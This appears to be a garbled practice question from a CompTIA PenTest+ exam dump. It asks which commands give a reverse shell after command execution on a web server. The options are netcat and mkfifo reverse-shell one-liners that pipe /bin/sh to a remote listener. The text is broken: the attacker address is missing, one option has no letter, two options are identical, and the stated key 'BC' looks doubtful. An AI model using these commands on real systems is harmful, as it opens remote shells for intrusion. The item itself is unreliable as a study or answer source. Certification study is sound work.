CompTIA PenTest+ PT0-001 – Question30

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at Which of the following are possible ways to do so? (Select TWO).

nc 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 44444>/tmp/f
D. nc -e /bin/sh 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 444444>/tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 44444>/tmp/f

Section: (none)

Correct Answer: BC